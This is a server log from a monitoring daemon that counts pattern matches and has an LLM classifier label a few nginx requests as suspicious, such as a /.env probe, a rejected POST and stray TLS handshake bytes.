Mar 20 01:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:01.980752 [observer] Pipeline: processed=442 pattern_hits=437 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:01.980787 [observer] Patterns: hash=437 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:31.933444 [observer] Pipeline: processed=445 pattern_hits=440 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:31.933595 [observer] Patterns: hash=440 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:01.978704 [observer] Pipeline: processed=447 pattern_hits=442 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:01.979705 [observer] Patterns: hash=442 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:31.934420 [observer] Pipeline: processed=451 pattern_hits=446 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:31.934450 [observer] Patterns: hash=446 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:01.946756 [observer] Pipeline: processed=453 pattern_hits=448 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:01.946784 [observer] Patterns: hash=448 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:31.934274 [observer] Pipeline: processed=457 pattern_hits=452 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:31.934300 [observer] Patterns: hash=452 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:01.944857 [observer] Pipeline: processed=461 pattern_hits=456 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:01.944914 [observer] Patterns: hash=456 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:31.933269 [observer] Pipeline: processed=464 pattern_hits=459 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:31.933290 [observer] Patterns: hash=459 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:01.945396 [observer] Pipeline: processed=467 pattern_hits=462 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:01.945428 [observer] Patterns: hash=462 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:31.950330 [observer] Pipeline: processed=469 pattern_hits=464 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:31.950351 [observer] Patterns: hash=464 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:01.969695 [observer] Pipeline: processed=473 pattern_hits=468 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:01.973052 [observer] Patterns: hash=468 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:31.944644 [observer] Pipeline: processed=475 pattern_hits=470 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:31.944674 [observer] Patterns: hash=470 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887769 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887814 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T01:31:48.802441998Z 2026/03/20 01:31:48 [error] 422#422: *743443 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 154.29.232.95, server: _, request: "GE...
Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887893 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T01:31:48.802456145Z 154.29.232.95 - - [20/Mar/2026:01:31:48 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 01:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:01.951310 [observer] Pipeline: processed=480 pattern_hits=473 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:01.951345 [observer] Patterns: hash=473 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:32:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:03.422243 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 01:32:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:03.422279 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T01:31:49.291748684Z 154.29.232.95 - - [20/Mar/2026:01:31:49 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 01:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:31.943243 [observer] Pipeline: processed=484 pattern_hits=477 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:31.943267 [observer] Patterns: hash=477 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:01.941540 [observer] Pipeline: processed=487 pattern_hits=480 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:01.941566 [observer] Patterns: hash=480 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:31.934658 [observer] Pipeline: processed=490 pattern_hits=483 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:31.934684 [observer] Patterns: hash=483 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:01.954494 [observer] Pipeline: processed=494 pattern_hits=487 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:01.954525 [observer] Patterns: hash=487 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:31.934061 [observer] Pipeline: processed=498 pattern_hits=491 llm_calls=7 llm_errors=0 learned=0
Mar 20 01:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:31.934589 [observer] Patterns: hash=491 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7
Mar 20 01:34:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:41.185922 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex
Mar 20 01:34:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:41.185958 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
Mar 20 01:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:46.793048 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 01:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:46.793080 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 01:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:53.321333 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 01:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:53.321369 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.069931 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.069967 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T01:34:52.008107287Z 205.210.31.140 - - [20/Mar/2026:01:34:52 +0000] "_" "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xAE\x90\x1B\xEE\xE9\xDDN#\x11\xA3\x22\xA7\x86^i\x17\xB2\x08\x02Q\xD5y\x...
Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.070069 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T01:34:52.012072174Z 205.210.31.140 - - [20/Mar/2026:01:34:52 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03#\xCD\xF2\xB2cX\xE3\x88\xC5y\x8A\xFD\xC7vRY\xF7\xBB\xBB\xFE\xCE\x99\xB1#...
Mar 20 01:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:01.945399 [observer] Pipeline: processed=505 pattern_hits=494 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:01.945431 [observer] Patterns: hash=494 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:31.933688 [observer] Pipeline: processed=509 pattern_hits=498 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:31.933712 [observer] Patterns: hash=498 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:01.943736 [observer] Pipeline: processed=511 pattern_hits=500 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:01.943761 [observer] Patterns: hash=500 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:31.935488 [observer] Pipeline: processed=514 pattern_hits=503 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:31.935522 [observer] Patterns: hash=503 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:01.950386 [observer] Pipeline: processed=517 pattern_hits=506 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:01.950436 [observer] Patterns: hash=506 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:31.951110 [observer] Pipeline: processed=519 pattern_hits=508 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:31.951134 [observer] Patterns: hash=508 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:01.967323 [observer] Pipeline: processed=523 pattern_hits=512 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:01.967351 [observer] Patterns: hash=512 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:31.941661 [observer] Pipeline: processed=525 pattern_hits=514 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:31.941685 [observer] Patterns: hash=514 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:01.959123 [observer] Pipeline: processed=531 pattern_hits=520 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:01.959151 [observer] Patterns: hash=520 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:31.944098 [observer] Pipeline: processed=533 pattern_hits=522 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:31.944124 [observer] Patterns: hash=522 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:01.940518 [observer] Pipeline: processed=536 pattern_hits=525 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:01.940573 [observer] Patterns: hash=525 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:31.933999 [observer] Pipeline: processed=539 pattern_hits=528 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:31.934023 [observer] Patterns: hash=528 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:01.979758 [observer] Pipeline: processed=541 pattern_hits=530 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:01.979790 [observer] Patterns: hash=530 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:31.933505 [observer] Pipeline: processed=545 pattern_hits=534 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:31.933529 [observer] Patterns: hash=534 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:01.951727 [observer] Pipeline: processed=547 pattern_hits=536 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:01.951757 [observer] Patterns: hash=536 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:31.935266 [observer] Pipeline: processed=552 pattern_hits=541 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:31.935289 [observer] Patterns: hash=541 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:01.946614 [observer] Pipeline: processed=554 pattern_hits=543 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:01.946643 [observer] Patterns: hash=543 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:31.933712 [observer] Pipeline: processed=557 pattern_hits=546 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:31.933738 [observer] Patterns: hash=546 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:01.965415 [observer] Pipeline: processed=562 pattern_hits=551 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:01.965448 [observer] Patterns: hash=551 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:31.948557 [observer] Pipeline: processed=564 pattern_hits=553 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:31.948583 [observer] Patterns: hash=553 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:01.957455 [observer] Pipeline: processed=568 pattern_hits=557 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:01.957485 [observer] Patterns: hash=557 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:31.938121 [observer] Pipeline: processed=570 pattern_hits=559 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:31.938149 [observer] Patterns: hash=559 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:01.970803 [observer] Pipeline: processed=574 pattern_hits=563 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:01.970834 [observer] Patterns: hash=563 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:31.943298 [observer] Pipeline: processed=576 pattern_hits=565 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:31.943325 [observer] Patterns: hash=565 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:01.971054 [observer] Pipeline: processed=578 pattern_hits=567 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:01.971087 [observer] Patterns: hash=567 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:31.934657 [observer] Pipeline: processed=582 pattern_hits=571 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:31.934699 [observer] Patterns: hash=571 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:01.970151 [observer] Pipeline: processed=584 pattern_hits=573 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:01.970915 [observer] Patterns: hash=573 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:31.939178 [observer] Pipeline: processed=588 pattern_hits=577 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:31.939209 [observer] Patterns: hash=577 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:01.982597 [observer] Pipeline: processed=590 pattern_hits=579 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:01.982629 [observer] Patterns: hash=579 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:31.933658 [observer] Pipeline: processed=596 pattern_hits=585 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:31.933681 [observer] Patterns: hash=585 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:01.945042 [observer] Pipeline: processed=598 pattern_hits=587 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:01.945069 [observer] Patterns: hash=587 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:31.949837 [observer] Pipeline: processed=600 pattern_hits=589 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:31.949866 [observer] Patterns: hash=589 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:01.960014 [observer] Pipeline: processed=604 pattern_hits=593 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:01.960042 [observer] Patterns: hash=593 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:31.941559 [observer] Pipeline: processed=606 pattern_hits=595 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:31.941710 [observer] Patterns: hash=595 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:01.943961 [observer] Pipeline: processed=610 pattern_hits=599 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:01.943987 [observer] Patterns: hash=599 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:31.934423 [observer] Pipeline: processed=612 pattern_hits=601 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:31.934447 [observer] Patterns: hash=601 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:01.942811 [observer] Pipeline: processed=616 pattern_hits=605 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:01.942835 [observer] Patterns: hash=605 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:31.934429 [observer] Pipeline: processed=618 pattern_hits=607 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:31.934455 [observer] Patterns: hash=607 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:01.950651 [observer] Pipeline: processed=620 pattern_hits=609 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:01.950681 [observer] Patterns: hash=609 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:31.934469 [observer] Pipeline: processed=626 pattern_hits=615 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:31.934493 [observer] Patterns: hash=615 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:01.973607 [observer] Pipeline: processed=628 pattern_hits=617 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:01.973640 [observer] Patterns: hash=617 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:31.938457 [observer] Pipeline: processed=632 pattern_hits=621 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:31.938483 [observer] Patterns: hash=621 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:01.961070 [observer] Pipeline: processed=634 pattern_hits=623 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:01.961097 [observer] Patterns: hash=623 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:31.934607 [observer] Pipeline: processed=638 pattern_hits=627 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:31.934647 [observer] Patterns: hash=627 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:01.953782 [observer] Pipeline: processed=640 pattern_hits=629 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:01.954533 [observer] Patterns: hash=629 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:31.933651 [observer] Pipeline: processed=642 pattern_hits=631 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:31.933677 [observer] Patterns: hash=631 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:01.950759 [observer] Pipeline: processed=646 pattern_hits=635 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:01.950783 [observer] Patterns: hash=635 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:31.949255 [observer] Pipeline: processed=648 pattern_hits=637 llm_calls=11 llm_errors=0 learned=0
